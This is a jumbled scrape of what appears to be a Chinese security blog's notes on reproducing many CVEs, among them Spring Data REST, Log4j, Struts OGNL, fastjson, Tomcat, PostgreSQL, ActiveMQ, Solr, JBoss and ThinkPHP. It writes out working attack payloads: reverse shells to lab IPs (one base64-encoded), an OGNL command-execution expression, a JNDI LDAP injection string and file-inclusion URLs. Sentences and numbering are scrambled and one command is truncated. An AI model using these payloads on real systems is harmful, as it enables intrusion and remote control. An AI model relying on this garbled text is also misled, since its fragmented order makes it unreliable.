weixin_46626737的博客

设置两个会话，就是同时登陆两个数据库，第一个Select GET_LOCK('a',10);4）三者的关系，Rumtime封装了ProcessBuilder的方法，ProcessBuilder封装了ProcessImpl的方法。benchmark（count,expr），count代表执行次数，expr代表执行的语句。1）@是用户变量，select @user from users;2）@@是系统变量，select @@database;3）漏洞攻击（系统漏洞，其他web漏洞，数据库漏洞等等）

10）mssql，orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1）脏牛内核提权----------------------------------------------no----------------------------------------------

2.ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）5.Elasticsearch写入webshell漏洞（WooYun-2015-110216）3.ElasticSearch 目录穿越漏洞（CVE-2015-3337）4.ElasticSearch 目录穿越漏洞（CVE-2015-5531）3）漏洞版本:

在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub。1）漏洞原理：Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。

目录服务是一个特殊的数据库，用来保存描述性的、基于属性的详细信息，支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数，发送到log4j，打印到日志中，开始解析{}中的内容，发现是ldap实现的jndi，然后调用lookup。功能去查找x.x.x.x/test.class该文件，然后发现是远程服务器的文件，需要通过codebase去下载该class类，然后下载后，对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。

{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}（后有一个换行符）在放置参数的过程中会将参数进行OGNL渲染，造成任意命令执行漏洞。

3>使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个rmi或者ladp服务。则会发现rmi服务会有回显，而且shell会反弹回来。6>则会发现rmi服务会有回显，而且shell会反弹回来。（3）通过dnslog来判断是否使用了fastjson。2>将class文件放到http服务目录下。（2）查看其fastjson的版本。（1）漏洞版本：1.2.24之前。（1）漏洞版本：1.2.48以前。2）开启监听2233端口。1）写一个java文件。3）开启一个rmi服务。

（10）concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。（5）between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=（14）ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。

-script http-methods --script-args http.useragent=”Mozilla 5” 修改user-agent字段。--script-trace --script=vuln/.... 来查看发送的数据包。--script=http-methods 扫描http允许的方法。--script-help=dos 查看dos脚本的帮助文档。--script=http-brute http认证爆破。--script=http-ls 扫描http目录。

漏洞原理：开启了put方法，且readonly初始化参数由默认值设置为false。1.tomcat的put方法任意文件伤处(CVE-2017-12615)2.tomcat的apj文件包含漏洞（CVE-2020-1938）漏洞版本：7.0.0-7.0.79。

解密脚本地址：https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧：/api/video/v2/cameras/previewURLs，访问是否返回rtsp数据流地址，若返回，访问就是摄像头。poc检测工具地址：https://github.com/sccmdaveli/hikvision-poc。漏洞版本：大多数设备。

需要超级管理员数据库用户（postgres）才可以，因为在9.3版本之后，默认得开启了COPY TO/FROM PROGRAM功能，可以让超级用户去执行任意系统命令。2.PostgreSQL 高权限命令执行漏洞（CVE-2019-9193）1.PostgreSQL 提权漏洞（CVE-2018-1058）漏洞版本：9.3-11.2。漏洞版本：9.3-10。

执行命令python fpm.py 127.0.0.1 /usr/local/lib/php/PEAR.php -c '

../，比如在cmd命令行中，cd 到一个不存在的目录，会报错，在对传参的参数进行过滤时，需要过滤代码，但是传参点很多，需要多次输入过滤代码，开发人员考虑到使用将过滤代码写入过滤文件，通过include包含该文件，来达到一个过滤的目的，假如这个包含的文件是可以控制的，那么就可能导致文件包含，该漏洞中，主要是因为对于传参包含文件的参数过滤时，只是对其内容进行检测白名单验证，只要target参数是白名单中的。但是如果在其后加一个/../，系统会默认认为还是在当前目录，就不会对错误目录进行检查，也就不会报错；

就是上传文件，在1.php文件名后面加一个0x0ahex值进行一个绕过，恰好有解析漏洞，将1.php%0a当做1.php执行。--#exec cmd="id" -->，直接访问，就会显示。3.Apache HTTP Server路径穿越漏洞(CVE-2021-41773、CVE-2021-42013)上传文件，bp抓包修改为123.php.jpg，访问其路径，会以php格式执行。漏洞版本：Apache HTTP Server 2.4.49-2.4.50。漏洞版本：通用，得看是否开启了ssi组件。

{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204，成功，但是该路径下没有解析权限，所以需要使用MOVE方法进行移动到正常的物理路径。弱口令：admin/admin/

在根据名字构造链接，进行访问，post传参：(验证是否存在漏洞poc)在根据名字构造链接，进行访问，post传参：(验证是否存在漏洞poc)漏洞版本：Apache Solr 5.0.0 ~8.3.1。漏洞版本：Apache Solr < 8.2.0。3.solr远程代码执行（CVE-2017-12629）5.solr的XXE漏洞（CVE-2017-12629）2.solr远程代码执行（CVE-2019-0193）漏洞版本：Apache Solr < 7.1。漏洞版本：Apache Solr < 7.1。

1.apache flink文件上传漏洞(CVE-2020-17518)-------未复现出来。漏洞版本：Apache Flink 1.5.1 ~ 1.11.2。漏洞版本：Apache Flink 1.11.0-1.11.2。2.apache flink目录遍历(CVE-2020-17519)

poc：http://192.168.88.130:8080/jbossmq-httpil/HTTPServerILServlet 若出现This is the JBossMQ HTTP-IL则表示有漏洞。3.JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）2.JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）操作技巧：类似于JBoss 5.x/6.x 反序列化漏洞。漏洞版本：JBoss AS 4.x及之前版本。漏洞版本：5.x/6.x。

post请求-http://192.168.80.129:8080/index.php?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件。s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件。漏洞版本：ThinkPHP < 5.1.23。漏洞版本：5.1.x 5.0.x。